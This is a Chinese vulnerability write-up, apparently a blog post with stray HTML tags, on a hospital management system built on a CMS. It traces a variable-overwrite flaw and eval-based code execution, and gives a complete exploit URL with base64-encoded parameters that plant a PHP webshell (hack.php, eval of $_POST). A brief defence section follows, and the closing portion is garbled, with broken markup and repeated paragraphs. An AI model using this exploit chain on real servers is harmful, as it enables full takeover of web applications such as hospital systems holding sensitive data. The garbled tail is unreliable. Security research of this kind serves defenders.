某医院管理系统Getshell漏洞分析与利用<\/h1>

漏洞概述<\/h2>
本文详细分析某医院管理系统（基于某博CMS）存在的变量覆盖漏洞及后续Getshell利用链。该漏洞组合了变量覆盖和数据库配置修改，最终通过eval函数执行恶意代码实现Getshell。<\/p>

漏洞分析<\/h2>

1. 变量覆盖漏洞<\/h3>

漏洞位于\/inc\/common.inc.php<\/code>文件中，关键代码如下：<\/p>

$_POST =<\/span> Add_S<\/span>($_POST);
<\/span><\/span>$_GET =<\/span> Add_S<\/span>($_GET);
<\/span><\/span>$_COOKIE =<\/span> Add_S<\/span>($_COOKIE);
<\/span><\/span>
<\/span><\/span>foreach<\/span>($_COOKIE AS<\/span> $_key =><\/span> $_value){
<\/span><\/span>    unset<\/span>(
<\/span><\/span>$$<\/span>
<\/span><\/span>_key<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>foreach<\/span>($_POST AS<\/span> $_key =><\/span> $_value){
<\/span><\/span>    !<\/span>ereg<\/span>("^\_[A-Z]+"<\/span>, $_key) &&<\/span> 
<\/span><\/span>$$<\/span>
<\/span><\/span>_key<\/span> =<\/span> $_POST[$_key];
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>foreach<\/span>($_GET AS<\/span> $_key =><\/span> $_value){
<\/span><\/span>    !<\/span>ereg<\/span>("^\_[A-Z]+"<\/span>, $_key) &&<\/span> 
<\/span><\/span>$$<\/span>
<\/span><\/span>_key<\/span> =<\/span> $_GET[$_key];
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>这段代码存在以下问题：<\/p>

遍历$_GET<\/code>、$_POST<\/code>和$_COOKIE<\/code>数组<\/li>
将数组键名作为变量名，键值作为变量值<\/li>
仅通过简单的正则^\_[A-Z]+<\/code>过滤（排除以大写字母开头的变量）<\/li>
导致攻击者可以覆盖任意变量<\/li>
<\/ol>
2. 漏洞验证<\/h3>
验证代码如下：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>$id =<\/span> 111111<\/span>;
<\/span><\/span>echo<\/span> $id;
<\/span><\/span>echo<\/span> "<\/br>"<\/span>;
<\/span><\/span>foreach<\/span>($_COOKIE AS<\/span> $_key =><\/span> $_value){
<\/span><\/span>    unset<\/span>(
<\/span><\/span>$$<\/span>
<\/span><\/span>_key<\/span>);
<\/span><\/span>}
<\/span><\/span>foreach<\/span>($_POST AS<\/span> $_key =><\/span> $_value){
<\/span><\/span>    !<\/span>ereg<\/span>("^\_[A-Z]+"<\/span>, $_key) &&<\/span> 
<\/span><\/span>$$<\/span>
<\/span><\/span>_key<\/span> =<\/span> $_POST[$_key];
<\/span><\/span>}
<\/span><\/span>foreach<\/span>($_GET AS<\/span> $_key =><\/span> $_value){
<\/span><\/span>    !<\/span>ereg<\/span>("^\_[A-Z]+"<\/span>, $_key) &&<\/span> 
<\/span><\/span>$$<\/span>
<\/span><\/span>_key<\/span> =<\/span> $_GET[$_key];
<\/span><\/span>}
<\/span><\/span>echo<\/span> $id;
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>访问?id=test<\/code>会将$id<\/code>的值从111111覆盖为test。<\/p>
3. 文件写入漏洞<\/h3>
在fujsarticle.php<\/code>中，存在文件写入操作：<\/p>
$FileName =<\/span> dirname<\/span>(__FILE__<\/span>).<\/span>"\/..\/cache\/fujsarticle_cache\/"<\/span>;
<\/span><\/span>if<\/span>($type ==<\/span> 'like'<\/span>){
<\/span><\/span>    $FileName .=<\/span> floor<\/span>($id\/<\/span>3000<\/span>).<\/span>"\/"<\/span>;
<\/span><\/span>} else<\/span> {
<\/span><\/span>    unset<\/span>($id);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>if<\/span>(!<\/span>is_dir<\/span>(dirname<\/span>($FileName))){
<\/span><\/span>    makepath<\/span>(dirname<\/span>($FileName));
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>if<\/span>((time<\/span>() -<\/span> filemtime<\/span>($FileName)) ><\/span> ($webdb["cache_time_<\/span>$type<\/span>"<\/span>] *<\/span> 60<\/span>)){
<\/span><\/span>    write_file<\/span>($FileName, "<?php <\/span>\r\n\$<\/span>show=stripslashes('"<\/span>.<\/span>addslashes<\/span>($show).<\/span>"'); ?>"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>通过变量覆盖可以控制$FileName<\/code>和$show<\/code>变量，实现任意文件写入。<\/p>
漏洞利用链<\/h2>
第一步：覆盖数据库配置<\/h3>
利用变量覆盖漏洞修改\/data\/mysql_config.php<\/code>文件内容，导致数据库配置错误。<\/p>
第二步：利用jf.php执行恶意代码<\/h3>
jf.php<\/code>关键代码：<\/p>
require<\/span>(dirname<\/span>(__FILE__<\/span>).<\/span>"\/"<\/span>.<\/span>"global.php"<\/span>);
<\/span><\/span>$lfjdb &&<\/span> $lfjdb[money<\/span>] =<\/span> get_money<\/span>($lfjdb[uid<\/span>]);
<\/span><\/span>$query =<\/span> $db-><\/span>query<\/span>("SELECT * FROM <\/span>{<\/span>$pre}<\/span>jfsort ORDER BY list"<\/span>);
<\/span><\/span>while<\/span>($rs =<\/span> $db-><\/span>fetch_array<\/span>($query)){
<\/span><\/span>    $fnameDB[$rs[fid<\/span>]] =<\/span> $rs[name<\/span>];
<\/span><\/span>    $query2 =<\/span> $db-><\/span>query<\/span>("SELECT * FROM <\/span>{<\/span>$pre}<\/span>jfabout WHERE fid='<\/span>$rs[fid]<\/span>' ORDER BY list"<\/span>);
<\/span><\/span>    while<\/span>($rs2 =<\/span> $db-><\/span>fetch_array<\/span>($query2)){
<\/span><\/span>        eval<\/span>("<\/span>\$<\/span>rs2[title]=<\/span>\"<\/span>$rs2[title]<\/span>\"<\/span>;"<\/span>);
<\/span><\/span>        eval<\/span>("<\/span>\$<\/span>rs2[content]=<\/span>\"<\/span>$rs2[content]<\/span>\"<\/span>;"<\/span>);
<\/span><\/span>        $jfDB[$rs[fid<\/span>]][] =<\/span> $rs2;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用方式：<\/p>

在攻击者控制的数据库中创建qb_jfabout<\/code>和qb_jfsort<\/code>表<\/li>
在qb_jfabout<\/code>表的title和content字段插入恶意代码<\/li>
<\/ol>
表结构示例：<\/p>
id | fid | list | title               | content
1  | 1   | 1    | "+$_GET[a]($_GET[b]);+" | "+$_GET[a]($_GET[b]);+"
<\/code><\/pre>
第三步：触发漏洞写入Webshell<\/h3>
构造如下请求：<\/p>
\/do\/jf.php?dbuser=数据库用户&dbpw=数据库密码&dbhost=数据库地址&dbname=数据库名称&pre=qb_&dbcharset=gbk&submit=123&a=assert&b=${file_put_contents(base64_decode('aGFjay5waHA='),base64_decode('PD9waHAgQGV2YWwoJyRfUE9TVFtoYWNrXScpOz8+'))};
<\/code><\/pre>
其中：<\/p>

aGFjay5waHA=<\/code>是hack.php<\/code>的base64编码<\/li>
PD9waHAgQGV2YWwoJyRfUE9TVFtoYWNrXScpOz8+<\/code>是<?php @eval('$_POST[hack]');?><\/code>的base64编码<\/li>
<\/ul>
该请求会在当前目录生成一个名为hack.php<\/code>的Webshell，内容为<?php @eval('$_POST[hack]');?><\/code>。<\/p>
防御措施<\/h2>

修复变量覆盖漏洞：

避免使用`<\/li>
<\/ul>
<\/li>
<\/ol>
\[`可变变量
   - 使用白名单方式限制可覆盖的变量
   - 对用户输入进行严格过滤

2. 修复eval执行漏洞：
   - 避免直接eval用户可控数据
   - 对数据库内容进行严格过滤

3. 其他安全建议：
   - 限制数据库连接参数修改权限
   - 对文件写入操作进行严格权限控制
   - 定期进行安全审计和代码审查

## 总结

该漏洞利用链展示了从变量覆盖到最终Getshell的完整过程，强调了安全开发中需要关注的多方面问题。开发人员应当避免使用危险函数，并对所有用户输入保持警惕。\]<\/span><\/p>

某医院管理系统Getshell漏洞分析与利用<\/h1>

漏洞概述<\/h2> 本文详细分析某医院管理系统（基于某博CMS）存在的变量覆盖漏洞及后续Getshell利用链。该漏洞组合了变量覆盖和数据库配置修改，最终通过eval函数执行恶意代码实现Getshell。<\/p>

漏洞分析<\/h2>

第一步：覆盖数据库配置<\/h3> 利用变量覆盖漏洞修改\/data\/mysql_config.php<\/code>文件内容，导致数据库配置错误。<\/p>

漏洞概述<\/h2>
本文详细分析某医院管理系统（基于某博CMS）存在的变量覆盖漏洞及后续Getshell利用链。该漏洞组合了变量覆盖和数据库配置修改，最终通过eval函数执行恶意代码实现Getshell。<\/p>

第一步：覆盖数据库配置<\/h3>
利用变量覆盖漏洞修改`\/data\/mysql_config.php<\/code>文件内容，导致数据库配置错误。<\/p>`